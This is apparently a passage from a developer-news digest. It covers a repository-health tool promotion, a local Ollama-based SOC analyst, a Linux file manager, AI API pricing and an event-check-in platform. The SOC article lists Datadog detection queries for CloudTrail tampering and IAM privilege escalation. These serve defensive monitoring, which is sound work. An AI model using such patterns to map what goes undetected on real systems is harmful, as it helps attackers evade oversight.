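# Manifest file names from the list above, mapped to their ecosystems.
MANIFESTS = {
    "package.json": "Node",
    "requirements.txt": "Python",
    "pyproject.toml": "Python",
    "Cargo.toml": "Rust",
    "go.mod": "Go",
    "pom.xml": "Java",
    "Gemfile": "Ruby",
}


def detect_ecosystems(paths: list[str]) -> dict[str, list[str]]:
    """Group manifest paths found in a repository file listing by ecosystem."""
    found: dict[str, list[str]] = {}
    for path in paths:
        ecosystem = MANIFESTS.get(PurePosixPath(path).name)
        if ecosystem:
            found.setdefault(ecosystem, []).append(path)
    return found
```

Matching on the file name rather than the full path means manifests in nested directories, such as those in a monorepo, are picked up as well.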
🗂 Interactive File Tree
Collapsible directory explorer with file type icons.
See the structure of any codebase instantly.
Search and filter in real time.
📖 Beautiful README Renderer
Full GitHub Flavored Markdown.
Images. Tables. Code blocks. Everything.
Read the documentation without leaving the tool.
📤 One-Click Share Card
Export a beautiful PNG summary card.
Share on LinkedIn. Post on Twitter.
Send to your team before a code review.
I ran the library that destroyed my production server through it.
31 out of 100. Grade D.
In 3 seconds.
The exact score I needed at 11:47 PM on that Tuesday
instead of at 3:14 AM the next morning.
I've been using RepoLens every single day since I built it.
My entire team uses it now before every dependency decision.
We have a rule — no new library gets added without a score.
We haven't had a single library-related production incident since.
Not one.
I'm sharing it completely free.
No sign-up required.
No account.
No credit card.
No limits.
Works on every public GitHub repository on the planet.
Instant results. Every time.
And the entire thing is open source.
React 18 frontend. Vite. Tailwind CSS.
FastAPI Python backend. GitHub REST API only.
File-based caching. Rate limiting. Security headers.
Full type hints. Clean architecture.
If you want to see how it's built — every line of code is there.
If you want to contribute — PRs are open.
If you want to self-host it — full Docker support.
⭐ Star it on GitHub:
github.com/vignesh2027/GitHub-Repo-Analyzer
Drop any GitHub repo URL in the comments below.
I will personally reply to every single one
with its health score and what I'd fix first.
And tell me —
What's the worst GitHub repo you ever trusted?
What happened?
Because I have a feeling I'm not the only one
who learned this lesson the hard way.

---
## Building a Local AI SOC Analyst on an M1 MacBook Pro

> Published: 2026-05-24 04:16:29+00:00
> Source: https://dev.to/mike_anderson_d01f52129fb/building-a-local-ai-soc-analyst-on-an-m1-macbook-pro-2cl9
> wpnews: https://wpnews.pro/news/building-a-local-ai-soc-analyst-on-an-m1-macbook-pro

The article describes the development of a local AI-powered SOC analyst that runs on an M1 MacBook Pro, designed to assist with daily security operations by triaging and analyzing alerts from existing cloud-native monitoring tools like Datadog, PagerDuty, and Sysdig. The solution uses Ollama to run local models (llama3.2:3b and qwen3:8b) within a Python harness, focusing on summarizing findings, correlating evidence, and producing daily security notes without automating production changes. A key lesson was that the model alone was insufficient; success required combining the right model with controlled prompts, use-case-driven analysis, and realistic hardware expectations.

We started with a practical SOC problem: build an AI-based SOC analyst that runs locally on an M1 MacBook Pro and helps with daily security operations across an existing cloud-native monitoring and alerting stack.
The environment already had strong telemetry and alerting coverage:
The problem was not lack of logs or alerts. The real challenge was analyst workflow. The SOC still needed a repeatable way to review alerts, correlate evidence, summarize findings, identify missing context, and produce daily security notes without manually jumping between tools every time.
The working solution became a local AI SOC analyst pattern:
| Component | Role |
| --- | --- |
| Ollama | Local model runner |
| llama3.2:3b | Stable default model for M1 daily SOC work |
| qwen3:8b | Optional larger model for focused deeper analysis |
| Python harness | SOC workflow, prompts, guardrails, and integrations |
| AI runner CLI | Analyst-facing command-line interface |
| Datadog | Primary log, signal, dashboard, and monitoring source |
| PagerDuty | Alert and incident routing source |
| Sysdig | Separate runtime policy signal source |
| Human analyst | Final decision authority |
The important lesson was that the model alone was not the solution. The working solution came from combining the right model, a controlled harness, bounded prompts, use-case-driven analysis, and realistic expectations about local MacBook hardware.
The goal was to build a local AI-based SOC analyst on an M1 MacBook Pro.
The main telemetry flow looked like this:
AWS CloudTrail
AWS Security Hub
Route53 VPC DNS Firewall
SES
SNS
Cloudflare logs
Application logs
GitHub audit logs crawler
|
v
Datadog
|
v
Datadog Cloud Security rules
Datadog monitors
Datadog dashboards
|
v
PagerDuty
Sysdig was separate:
Kubernetes runtime activity
|
v
Sysdig runtime policies
|
v
PagerDuty
That distinction mattered. Datadog was the central place for logs, detections, monitors, and dashboards. Sysdig was not sending its logs to Datadog, so Sysdig alerts had to be treated as a separate runtime security signal path.
The expected solution was not a generic local chatbot. The expected solution was a repeatable local SOC assistant that could support:
We made one important architectural decision early: the local AI model should not become the detector.
Datadog and Sysdig already perform that role:
The local AI should sit above those systems as a triage and analysis layer.
That means the AI helps answer:
This keeps the control boundary clean. Detection stays with Datadog and Sysdig. Alerting stays with PagerDuty. The local AI helps the analyst move faster, ask better questions, and document the investigation more consistently.
The final working architecture was intentionally simple:
+------------------------------+
| AWS / Cloudflare / GitHub |
| Apps / SES / SNS / DNS FW |
+---------------+--------------+
|
v
+---------+
| Datadog |
| Logs |
| Signals |
| Metrics |
| Monitors|
+----+----+
|
v
+---------+
|PagerDuty|
+----+----+
+------------------+ +---------+
| Sysdig Runtime |------->|PagerDuty|
| Policies | +---------+
+------------------+
|
v
+------------------------------+
| Local AI SOC Analyst |
| M1 MacBook Pro |
| |
| Ollama |
| llama3.2:3b / qwen3:8b |
| Python SOC Harness |
| AI Runner CLI |
+------------------------------+
The local AI analyst was designed as read-only first.
It can summarize, correlate, recommend, and draft. It should not automatically make production changes.
Human approval should still be required for actions such as:
This matters because a wrong automated containment action can create a larger operational incident than the original alert.
The AI runner is the analyst-facing command-line interface.
It is what we run during daily operations.
Examples:
python ai_runner.py triage-json samples/sample_cloudtrail_delete_trail.json \
--use-case UC-006.3-cloudtrail-logging-disabled
python ai_runner.py security-signals --hours 24
python ai_runner.py pagerduty --hours 24
python ai_runner.py daily --hours 24 --out reports/daily_soc_report.md
The runner coordinates the work:
The runner is not the intelligence layer by itself. Its value is operational discipline. It prevents the analyst from manually copying logs, manually selecting prompts, manually formatting output, and manually saving results every time.
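The runner's source is not shown, so the following is only a sketch of how a command-line front end for the commands above might be wired with `argparse`. The subcommand and flag names mirror the examples; the defaults and help strings are assumptions.

```python
import argparse


def build_parser() -> argparse.ArgumentParser:
    """Build a CLI parser mirroring the example commands (illustrative only)."""
    parser = argparse.ArgumentParser(prog="ai_runner.py")
    sub = parser.add_subparsers(dest="command", required=True)

    # triage-json <path> --use-case <id>
    triage = sub.add_parser("triage-json", help="Triage one JSON event file")
    triage.add_argument("path")
    triage.add_argument("--use-case", required=True)

    # security-signals / pagerduty --hours N
    for name in ("security-signals", "pagerduty"):
        recent = sub.add_parser(name, help=f"Review recent {name} items")
        recent.add_argument("--hours", type=int, default=24)

    # daily --hours N --out <file>
    daily = sub.add_parser("daily", help="Write the daily SOC report")
    daily.add_argument("--hours", type=int, default=24)
    daily.add_argument("--out", default="reports/daily_soc_report.md")
    return parser
```

Keeping each workflow behind its own subcommand is one way to get the operational discipline described here: the analyst picks a task, and the prompt, time window, and output path follow from it.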
The harness is the control layer around the model.
This is the difference between a chatbot and a SOC workflow tool.
The harness handles:
The harness gives the model boundaries.
For SOC operations, this is critical. A local AI model should not receive an unbounded pile of logs and be asked, “Is anything bad?” That produces weak output and increases hallucination risk.
Instead, the harness asks focused questions:
The model reasons. The harness controls the task.
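One way to picture "the harness controls the task" is a prompt builder that refuses unknown use cases and caps how much evidence reaches the model. The sketch below is hypothetical: the question text, the caps, and the function name are assumptions, and only the use-case ID comes from the examples in this article.

```python
import json

# Hypothetical use-case catalogue: each ID maps to one focused question.
USE_CASE_QUESTIONS = {
    "UC-006.3-cloudtrail-logging-disabled": (
        "Do these events show an attempt to stop, delete, or weaken "
        "CloudTrail logging? Who did it, from where, and was it expected?"
    ),
}

MAX_EVENTS = 20         # assumed cap on events per prompt
MAX_EVENT_CHARS = 1500  # assumed cap on characters per serialized event


def build_prompt(use_case: str, events: list[dict]) -> str:
    """Build a bounded, use-case-specific prompt instead of dumping raw logs."""
    question = USE_CASE_QUESTIONS[use_case]  # unknown use cases raise KeyError
    selected = events[:MAX_EVENTS]
    lines = [
        "You are assisting a SOC analyst. Use only the evidence below.",
        f"Use case: {use_case}",
        f"Question: {question}",
        f"Evidence ({len(selected)} of {len(events)} events):",
    ]
    for event in selected:
        lines.append(json.dumps(event, sort_keys=True)[:MAX_EVENT_CHARS])
    lines.append("List any missing evidence before giving a disposition.")
    return "\n".join(lines)
```

Telling the model how many events were dropped ("20 of 50") gives it, and the analyst reading the output, a hint that the picture may be incomplete.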
At first, a larger model such as qwen3:8b looked attractive because the problem involved cloud logs, security reasoning, and structured analysis.
That was a reasonable starting point. Larger models can be useful when the event bundle is small and the question requires deeper reasoning.
However, the target machine was an M1 MacBook Pro, not a dedicated GPU workstation. That changed the practical answer.
During testing, the first small triage workflow succeeded, but the machine became sluggish. Later, the heavier daily report failed with a local Ollama timeout:
ReadTimeout: HTTPConnectionPool(host='127.0.0.1', port=11434): Read timed out. (read timeout=300)
That error was useful because it showed:
So the issue was not the SOC design. The issue was local inference load: model size, prompt size, timeout, and hardware limits.
The model strategy was adjusted:
The final default became:
SOC_MODEL=llama3.2:3b
SOC_FAST_MODEL=llama3.2:3b
This was the right operational tradeoff.
A smaller model that finishes reliably is more useful than a larger model that freezes the analyst workstation or times out during daily operations.
The M1 MacBook Pro can run useful local AI workflows, but the workflow must be tuned.
The main constraints were:
The fix was not to abandon the local approach. The fix was to make the workflow smaller and more controlled:
Use a smaller default model.
Limit daily prompt size.
Start with 6-hour reports.
Increase to 24 hours after validation.
Increase the Ollama timeout where needed.
Avoid sending excessive raw logs to the model.
Use focused use-case prompts.
That is what made the solution usable.
ollama ps Showing Nothing
When checking which model was running, ollama ps returned nothing.
That does not always mean something is broken.
ollama ps shows models currently loaded in memory. If the model finished and unloaded, it may show nothing.
Useful checks:
ollama list
Shows installed models.
ollama ps
Shows currently loaded models.
ollama run llama3.2:3b
Manually starts a model.
This distinction helped avoid misdiagnosing a normal Ollama state as a failure.
The Mac became sluggish after running the local model.
The likely cause was local inference load, especially if a larger model was used.
The fix was to run the smaller model first:
SOC_MODEL=llama3.2:3b python ai_runner.py triage-json samples/sample_cloudtrail_delete_trail.json \
--use-case UC-006.3-cloudtrail-logging-disabled
For stability, Ollama can also be limited:
export OLLAMA_NUM_PARALLEL=1
export OLLAMA_MAX_LOADED_MODELS=1
export OLLAMA_KEEP_ALIVE=30m
The daily command failed because the model did not return within the configured timeout:
ReadTimeout: HTTPConnectionPool(host='127.0.0.1', port=11434): Read timed out. (read timeout=300)
The fix had three parts:
llama3.2:3b for daily reports.
A safer first run was:
SOC_MODEL=llama3.2:3b python ai_runner.py daily --hours 6 --out reports/daily_soc_report.md
Then scale to:
SOC_MODEL=llama3.2:3b python ai_runner.py daily --hours 24 --out reports/daily_soc_report.md
The lesson: daily reports should summarize bounded evidence, not feed unlimited raw logs into a local model.
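A simple way to keep evidence bounded is to aggregate events into counts before they reach the model. The sketch below assumes CloudTrail-style records with `eventName` and `sourceIPAddress` fields; the function name and the top-N cut-off are illustrative, not taken from the actual harness.

```python
from collections import Counter


def summarize_events(events: list[dict], top_n: int = 5) -> dict:
    """Reduce raw events to counts so the daily prompt stays small."""
    by_name = Counter(e.get("eventName", "unknown") for e in events)
    by_source = Counter(e.get("sourceIPAddress", "unknown") for e in events)
    return {
        "total_events": len(events),
        "top_event_names": by_name.most_common(top_n),
        "top_source_ips": by_source.most_common(top_n),
    }
```

A summary like this has a fixed size no matter how many events a 24-hour window contains, which is what keeps a small local model inside its timeout.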
The first successful test used a sample CloudTrail StopLogging event.
That is a meaningful test because attempts to stop CloudTrail logging may indicate defense evasion, unauthorized administrative activity, or compromised credentials.
The AI produced a high-risk SOC-style result similar to:
{
"severity": "High",
"confidence": 85,
"disposition": "true_positive",
"summary": "Suspicious attempt to stop CloudTrail logging...",
"suspicious_indicators": [
"StopLogging event by IAM user 'svc-deploy'",
"Source IP 203.0.113.45",
"User agent python-requests/2.32"
]
}
This proved the core workflow:
Local venv works.
Dependencies are installed.
AI runner executes.
Harness builds the prompt.
Ollama receives the request.
Local model returns SOC-style analysis.
The next improvement was to tighten expected output so the model always includes missing evidence and recommended follow-up queries. For production SOC use, those fields matter because they keep the analyst grounded in evidence.
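Tightening the expected output can be as simple as validating the model's JSON before an analyst sees it. In the sketch below, the first five field names come from the sample result above, while `missing_evidence` and `recommended_queries` are assumed names for the two fields the text says should always be present.

```python
import json
from typing import Optional

# First five keys appear in the sample result; the last two are assumed names.
REQUIRED_FIELDS = (
    "severity", "confidence", "disposition", "summary",
    "suspicious_indicators", "missing_evidence", "recommended_queries",
)


def validate_triage(raw: str) -> tuple[Optional[dict], list[str]]:
    """Parse model output and report problems instead of trusting it blindly."""
    try:
        result = json.loads(raw)
    except json.JSONDecodeError as exc:
        return None, [f"not valid JSON: {exc.msg}"]
    if not isinstance(result, dict):
        return None, ["top-level value is not a JSON object"]
    problems = [f"missing field: {name}" for name in REQUIRED_FIELDS if name not in result]
    confidence = result.get("confidence")
    if not isinstance(confidence, (int, float)) or not 0 <= confidence <= 100:
        problems.append("confidence must be a number between 0 and 100")
    return result, problems
```

A harness could retry once with the problem list appended to the prompt, or simply flag the result as incomplete for the analyst.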
Use case:
UC-006.3-cloudtrail-logging-disabled
Purpose:
Investigate possible CloudTrail tampering or defense evasion.
Example command:
python ai_runner.py datadog-query \
--query 'source:cloudtrail @evt.name:(StopLogging OR DeleteTrail OR UpdateTrail OR PutEventSelectors)' \
--hours 24 \
--use-case UC-006.3-cloudtrail-logging-disabled
Follow-up evidence should include:
Use case:
UC-007-iam-privilege-escalation
Example command:
python ai_runner.py datadog-query \
--query 'source:cloudtrail @evt.name:(AttachUserPolicy OR PutUserPolicy OR CreateAccessKey OR UpdateAssumeRolePolicy OR PassRole)' \
--hours 24 \
--use-case UC-007-iam-privilege-escalation
The AI should help determine whether the activity was expected administration, automated deployment behavior, or suspicious privilege escalation.
Use case:
UC-011-cloudflare-waf-attack
Example command:
python ai_runner.py datadog-query \
--query 'source:cloudflare (@action:block OR @action:challenge OR @security_action:block)' \
--hours 24 \
--use-case UC-011-cloudflare-waf-attack
The AI should summarize source distribution, attacked paths, WAF actions, spike patterns, and whether any traffic bypassed protections.
Use case:
UC-010-route53-dns-firewall-blocks
Example command:
python ai_runner.py datadog-query \
--query 'source:route53resolverdnsfirewall OR source:route53 @action:block' \
--hours 24 \
--use-case UC-010-route53-dns-firewall-blocks
The AI should help identify suspicious domains, affected workloads, recurring clients, and whether the blocked activity suggests malware, misconfiguration, or expected testing.
Use case:
UC-014-github-audit-risk
Example command:
python ai_runner.py datadog-query \
--query 'source:github (@action:*deploy_key* OR @action:*repo* OR @action:*workflow* OR @action:*branch_protection*)' \
--hours 24 \
--use-case UC-014-github-audit-risk
The AI should focus on risky repository changes, workflow changes, deploy key activity, branch protection changes, and unusual administrative actions.
The cases above are only a few examples. The same pattern extends to many other use cases, provided the architecture is followed.
The stable workflow became:
ollama serve
cd /Users/tariqual/Documents/local_ai_soc_analyst
source .venv/bin/activate
ollama list
python ai_runner.py triage-json samples/sample_cloudtrail_delete_trail.json \
--use-case UC-006.3-cloudtrail-logging-disabled
SOC_MODEL=llama3.2:3b python ai_runner.py daily --hours 6 --out reports/daily_soc_report.md
SOC_MODEL=llama3.2:3b python ai_runner.py daily --hours 24 --out reports/daily_soc_report.md
The report should be reviewed for:
The daily report is an analyst aid. It is not an automatic incident declaration.
The final solution works because it respects both the SOC workflow and the hardware.
It does not try to make the local model do everything.
It uses the existing security stack correctly:
Datadog detects and stores telemetry.
Sysdig detects runtime policy violations.
PagerDuty routes alerts.
The local AI harness gathers and structures evidence.
The model reasons over bounded context.
The analyst makes the final decision.
That is a realistic AI SOC operating model.
A strong model without a

---
## Carelo: A Modern Dual-Pane File Manager for Linux

> Published: 2026-05-24 04:13:10+00:00
> Source: https://dev.to/aheinze/carelo-a-modern-dual-pane-file-manager-for-linux-39c7
> wpnews: https://wpnews.pro/news/carelo-a-modern-dual-pane-file-manager-for-linux

Carelo is a modern dual-pane file manager for Linux, built with Tauri and Rust, designed to address the gap between polished macOS file managers like ForkLift and Linux's existing options. It features dual-pane browsing with tabs, rich previews for common media types, remote storage support, and fuzzy file search, prioritizing efficient local file operations and keyboard-driven workflows. The application aims to provide a current, practical file management experience for users transitioning from macOS to Linux.

Moving from macOS to Linux is usually easier than people expect. The terminal is excellent, package managers are powerful, window managers are flexible, and most development workflows feel at home quickly.
Then you start looking for a file manager.
Not just a basic file browser. A real dual-pane file manager. Something that lets you compare folders, move files with confidence, work with remote storage, preview content, open a terminal when needed, and keep your hands on the keyboard. Something modern enough to feel like it belongs on a current desktop, but practical enough to handle daily work.
On macOS, ForkLift fills that role well for me. It is polished, fast, and built around the kind of workflows power users actually repeat every day. After using that kind of tool, switching to Linux can feel surprisingly rough. Linux has capable file managers, and some classic dual-pane tools are extremely powerful, but the choices often fall into two categories: beautiful single-pane desktop browsers, or older commander-style tools that prioritize capability over modern interaction design.
Carelo started from that gap.
A dual-pane file manager is not just about showing two folders side by side. That is the easy part.
The real value is flow.
You want to keep a project folder on the left and a build output folder on the right. You want to copy assets from Downloads into a repo, inspect a PDF, rename a file, archive a folder, jump into a remote server, compare locations, and keep moving. You want drag and drop when it is faster, keyboard shortcuts when they are faster, and a preview panel when opening another app would break focus.
Linux has tools that cover pieces of this. Nautilus integrates well with GNOME. Dolphin is mature and feature-rich. Midnight Commander is still great in the terminal. Krusader is powerful. But if you are coming from a polished macOS dual-pane workflow, the overall experience can still feel fragmented.
Carelo is an attempt to build the file manager I wanted after moving from macOS to Linux: modern, local-first, dual-pane by default, and designed for everyday file work rather than nostalgia.
Carelo is a desktop file manager built with Tauri and Rust. It focuses on fast local file operations, dual-pane browsing, rich previews, remote storage, archives, and configurable tools.
The core idea is simple: keep the interface familiar, but make the workflow feel current.
Carelo is not trying to hide the filesystem or turn file management into a cloud dashboard. It is for people who know where their files live and want a better way to work with them.
Carelo starts with the dual-pane model because that is still the most efficient layout for many real tasks. Copying, moving, comparing, extracting, staging, and organizing files all benefit from seeing source and destination at the same time.
Each pane can have its own tabs, so you can keep multiple working locations open without losing context. The app also supports list, grid, and column views, making it possible to switch between dense file operations and more visual browsing depending on the folder.
The goal is not to force one workflow. It is to make common workflows cheap.
One of the biggest workflow breaks in file management is opening files just to know what they are.
Carelo includes a preview panel for metadata and common media types. Images, audio, video, PDFs, and text-like content can be inspected without leaving the file manager. The preview panel also shows practical file details such as size, timestamps, owner, group, permissions, and path information.
This matters more than it sounds. When you are cleaning up downloads, checking exported assets, reviewing documents, or comparing similar files, preview speed directly affects how focused the work feels.
Carelo has two search modes.
Fuzzy file search helps jump to files and folders by name. It is built for quick navigation inside the current location and streams partial results while scanning. Content search looks inside files, supports plain text streaming, and can search extracted text from formats such as PDFs and Office-style documents where supported.
Both search paths are cancellable and report progress through the current work indicator. That matters on large folders and remote locations, where a search should never make the app feel stuck.
A Linux file manager should not stop at the local disk.
Carelo supports remote volumes such as SFTP, FTP, SMB/CIFS, WebDAV, and S3-compatible storage through its remote storage layer. Remote locations appear in the sidebar, can be browsed in panes, and participate in normal file workflows where possible.
The goal is to make a remote server or NAS feel like part of the same working environment, without forcing every operation through a separate app.
Archives are part of file management, not a separate chore.
Carelo supports browsing and extracting archives, along with archive creation for common formats including ZIP, TAR, TAR.GZ, TAR.ZST, and 7Z. Long-running archive operations show progress and can be cancelled.
That makes archives behave more like file operations and less like modal interruptions.
Power users always have their own tools.
Carelo includes configurable context-menu tools, so commands such as opening a path in an editor can be added without changing the app. Tool commands can use placeholders like the selected path, and availability can be scoped to files, folders, or specific extensions.
The point is not to guess everyone’s setup. It is to make the setup configurable enough that Carelo can fit into yours.
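To illustrate the idea of scoped tools with placeholders, here is a small Python sketch. Carelo itself is built with Tauri and Rust, and its real configuration format is not shown here, so the `{path}` placeholder syntax, the `scope` values, and both function names are hypothetical.

```python
import shlex
from pathlib import PurePosixPath


def tool_applies(tool: dict, path: str, is_dir: bool) -> bool:
    """Check a tool's scope: 'files', 'folders', or a list of extensions."""
    scope = tool.get("scope", "any")
    if scope == "folders":
        return is_dir
    if scope == "files":
        return not is_dir
    if isinstance(scope, list):  # e.g. [".md", ".txt"]
        return not is_dir and PurePosixPath(path).suffix.lower() in scope
    return True


def expand_command(tool: dict, path: str) -> list[str]:
    """Split the command template first, then substitute {path} per argument."""
    return [arg.replace("{path}", path) for arg in shlex.split(tool["command"])]
```

Splitting the template before substituting means a path containing spaces stays a single argument, so no shell quoting is needed when the command is launched.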
You should, if they work for you.
Dolphin, Nautilus, Krusader, Double Commander, Midnight Commander, and others all have strengths. Carelo exists because none of them quite matched the experience I wanted after moving from ForkLift to Linux.
The missing piece was not one checkbox feature. It was the combination:
Carelo is built around that combination.
Carelo is for developers, designers, sysadmins, content workers, and Linux desktop users who spend real time moving through folders.
It is for people who want more than a simple file browser, but do not want to live entirely inside a terminal file manager.
It is for people who miss the feel of tools like ForkLift, but want something that fits a Linux-first workflow.
Carelo is still evolving, and that is part of the point. File managers are deeply personal tools. The only way to make one good is to use it, hit the rough edges, and keep sanding them down.
The direction is clear:
Linux deserves modern file management tools that are not just ports, clones, or nostalgia projects.
Carelo is one attempt to build that.

---
## AI API Pricing in 2026: What You Actually Pay for GPT-5.5, Claude Opus, Gemini, and 20+ Models

> Published: 2026-05-24 04:11:27+00:00
> Source: https://dev.to/neverknowsbest_5e174c23a3/ai-api-pricing-in-2026-what-you-actually-pay-for-gpt-55-claude-opus-gemini-and-20-models-3ani
> wpnews: https://wpnews.pro/news/ai-api-pricing-in-2026-what-you-actually-pay-for-gpt-5-5-claude-opus-gemini-and

According to the article, AI API pricing in 2026 is highly fragmented, with a 300x difference between the cheapest and most expensive models; for example, a prompt costing $30 on GPT-5.5 costs only $0.28 on DeepSeek V4 Flash. The article emphasizes that prompt caching can save up to 90-99% on costs, though Anthropic charges a 25% premium on cache writes, making it only cost-effective if the same prefix is used three or more times. The key takeaway is to match the model to the task, use caching aggressively, and route most traffic to budget models to significantly reduce API bills.

A prompt that costs $30 on GPT-5.5 costs $0.28 on DeepSeek V4 Flash. That's roughly a 100x difference, and it's real.
If you're building on AI APIs, the pricing landscape in 2026 is more fragmented than ever. Four major providers, twenty-plus models, and pricing tiers that include cache reads, cache writes, batch discounts, promotional pricing, and hidden thresholds. I built a token cost calculator to make sense of it. This is the pricing data behind it.
All prices are per million tokens (MTok) in USD, sourced from official provider docs as of May 2026.
Here's the full picture — all 20 models from cheapest to most expensive on input:
* DeepSeek V4 Pro: 75% promotional discount until May 31, 2026.
The Ratio column is output-to-input price. DeepSeek's 2x ratio means output tokens are proportionally much cheaper — important if your app generates long responses.
*5K input + 500 output tokens per request
Gemini 3.1 Pro is 2.5x cheaper than GPT-5.5 on input. But it doubles pricing for prompts over 200K tokens — a hidden cost that catches people off guard.
If your app sends the same system prompt or tool definitions repeatedly, caching matters more than base pricing. All providers offer ~90% savings on cached tokens, except DeepSeek which offers 98-99%.
The catch: Anthropic charges a 25% premium on cache writes. You pay $6.25/M instead of $5.00 the first time Opus processes a prefix. This means caching only saves money if you send the same prefix 3+ times within the cache TTL window. OpenAI and Google don't charge this premium — they just give you the discount.
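The break-even point can be checked with a few lines of arithmetic. The sketch below takes the figures quoted above as inputs (a $5.00/M base price, a 1.25x write multiplier, and a read price of about 0.1x for the ~90% discount); the function names and the 2.0x comparison value are assumptions added for illustration.

```python
from typing import Optional


def prefix_cost(uses: int, base: float, write_mult: float, read_mult: float) -> tuple[float, float]:
    """Return (uncached, cached) USD cost of sending a 1M-token prefix `uses` times."""
    uncached = uses * base
    # First use pays the write premium; every later use pays the cached read price.
    cached = base * write_mult + (uses - 1) * base * read_mult
    return uncached, cached


def break_even_uses(base: float, write_mult: float, read_mult: float, limit: int = 100) -> Optional[int]:
    """Smallest number of uses at which caching is cheaper, or None within `limit`."""
    for uses in range(1, limit + 1):
        uncached, cached = prefix_cost(uses, base, write_mult, read_mult)
        if cached < uncached:
            return uses
    return None
```

Plugging in the quoted numbers, `break_even_uses(5.00, 1.25, 0.10)` puts the break-even at the second use ($6.75 cached versus $10.00 uncached), so the "3+" figure reads as a conservative rule of thumb. With a steeper write premium, for example a purely illustrative 2.0x, the break-even does land on the third use. Actual thresholds depend on the provider's current rates and cache TTL tier.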
For a detailed breakdown, see How to Save 90% on AI API Costs with Prompt Caching.
Use a budget model when:
Stick with a frontier model when:
The smartest architecture routes 90% of traffic to a $0.10/M model and reserves the $5.00/M model for the 10% that actually needs it.
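The effect of that 90/10 split is easy to work out. The sketch below computes a traffic-weighted price per million tokens; it assumes requests on both tiers carry similar token volumes, which real workloads may not, and the function name is made up for this example.

```python
def blended_price(routes: list[tuple[float, float]]) -> float:
    """Weighted average USD price per million tokens for (traffic_share, price) pairs."""
    total_share = sum(share for share, _ in routes)
    if abs(total_share - 1.0) > 1e-9:
        raise ValueError("traffic shares must sum to 1.0")
    return sum(share * price for share, price in routes)


# 90% of traffic on a $0.10/M model, 10% on a $5.00/M model.
mixed = blended_price([(0.9, 0.10), (0.1, 5.00)])
saving = 1 - mixed / 5.00  # compared with sending everything to the $5.00/M model
```

With these inputs the blended price comes to about $0.59 per million tokens, roughly an 88% reduction compared with routing everything to the $5.00/M model.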
AI API pricing has collapsed. The gap between the cheapest and most expensive models is 300x on input and 450x on output. The key is matching the model to the task. Don't pay GPT-5.5 prices to classify emails. Don't use Flash-Lite to write complex code. Use caching aggressively, pick the right tier, and your API bill drops from a line item to a rounding error.
Full pricing tables for all 20+ models, including cache write/read tiers, batch pricing, and provider-specific notes: Complete API Pricing Comparison
I built tokencostcalc.com — a free token cost calculator. No ads, no affiliate links, no tracking. Just pick a model, enter your token usage, and see the actual cost.

---
## I Built a Free Offline-First Event Operations Platform at 13. Here's Why the Architecture Is Different.

> Published: 2026-05-24 04:07:13+00:00
> Source: https://dev.to/planit_06fdce959aa8b2466c/i-built-a-free-offline-first-event-operations-platform-at-13-heres-why-the-architecture-is-1bf5
> wpnews: https://wpnews.pro/news/i-built-a-free-offline-first-event-operations-platform-at-13-here-s-why-the-is

The article describes PlanIt, a free offline-first event operations platform built by a 13-year-old to solve coordination failures that occur during live events. Unlike traditional event software like Eventbrite or Cvent, which assume reliable internet and pre-registered staff, PlanIt caches attendee lists locally for uninterrupted check-in, uses PIN-based staff login for instant access, and includes a built-in walkie-talkie system for real-time communication. The platform prioritizes the operational layer of event execution over marketing and registration features.

Most event software is built around a fantasy.
The fantasy is that when you are running a real event, the WiFi works, your volunteers have personal accounts, your devices are dedicated, and nothing goes wrong at the door. Every major platform, Eventbrite, Whova, Cvent, is architected around that assumption. The server is the source of truth. Everything routes through the cloud. If the connection drops, the system stops.
I have watched that assumption fail in real environments. Lines back up. Staff switch to WhatsApp. Someone pulls out a spreadsheet. The software that was supposed to help becomes the thing people work around.
That is the problem I built PlanIt to solve.
The event software industry made a decision early on. It decided that events are primarily a registration and marketing problem. So it built registration pages, ticket sales, attendee engagement tools, sponsor dashboards, and email campaigns.
Those are real problems. But they are not the problems that kill an event on the day itself.
What kills an event on the day is coordination failure. The check-in desk falls behind because a device lost connection. Staff at two entrances have different information. A volunteer cannot log in because the organiser forgot to create their account. The team is split across three WhatsApp threads trying to figure out what is happening.
Nobody built software for that layer. So I did.
PlanIt is a free hosted event operations platform. It is not trying to be Eventbrite. It is trying to be the coordination layer that makes the day itself work.
Here is what that means in practice.
Every device running PlanIt caches the full attendee list locally. When internet connectivity drops, check-in continues without interruption. Scans are queued locally and sync automatically the moment connection is restored. Conflict resolution handles duplicate scans across entrances.
This is not a stretch goal or a future feature. It is the foundation the system is built on, because I designed around the assumption that connectivity will fail, not that it will hold.
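The pattern described here (local cache, queued scans, later reconciliation) can be sketched in a few lines. This is not PlanIt's code: the class and function names are hypothetical, and the "earliest scan wins" rule for duplicates across entrances is an assumed policy chosen only to make the example concrete.

```python
from dataclasses import dataclass, field


@dataclass
class Scan:
    guest_id: str
    device_id: str
    scanned_at: float  # seconds since epoch, taken from the device clock


@dataclass
class LocalCheckIn:
    """Per-device state: works without any network access."""
    device_id: str
    attendees: set[str]                      # cached attendee list
    checked_in: dict[str, Scan] = field(default_factory=dict)
    pending: list[Scan] = field(default_factory=list)  # not yet synced

    def scan(self, guest_id: str, now: float) -> str:
        if guest_id not in self.attendees:
            return "unknown"
        if guest_id in self.checked_in:
            return "duplicate"
        record = Scan(guest_id, self.device_id, now)
        self.checked_in[guest_id] = record
        self.pending.append(record)
        return "ok"

    def drain(self) -> list[Scan]:
        """Hand over queued scans once connectivity returns."""
        batch, self.pending = self.pending, []
        return batch


def reconcile(server_state: dict[str, Scan], batch: list[Scan]) -> list[Scan]:
    """Merge a device's batch into shared state; assumed rule: earliest scan wins.

    Returns the scans that lost a conflict so staff can review them.
    """
    rejected = []
    for scan in batch:
        current = server_state.get(scan.guest_id)
        if current is None:
            server_state[scan.guest_id] = scan
        elif scan.scanned_at < current.scanned_at:
            rejected.append(current)
            server_state[scan.guest_id] = scan
        else:
            rejected.append(scan)
    return rejected
```

A real system would also have to deal with clock drift between devices, which is one reason conflict resolution is harder in practice than this sketch suggests.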
Most platforms assume staff have personal email accounts and time to set up credentials before the event. Real events do not work that way. Volunteers show up on the day. Devices get handed between people. You need someone checked in and scanning within thirty seconds of arriving.
PlanIt uses PIN-based staff login. The organiser creates staff accounts in advance with usernames and PINs. Any team member can pick up any device, enter their PIN, and be operational immediately. No email. No password reset flow. No friction at the moment friction is most expensive.
This is how POS systems work. It is how warehouse scanners work. It is how hospital shift terminals work. It is not how event software works, and it should be.
Coordination failure at live events is mostly a communication failure. When something goes wrong at the door, the organiser needs to reach the team instantly without leaving the check-in interface, without opening a separate app, without relying on cellular coverage.
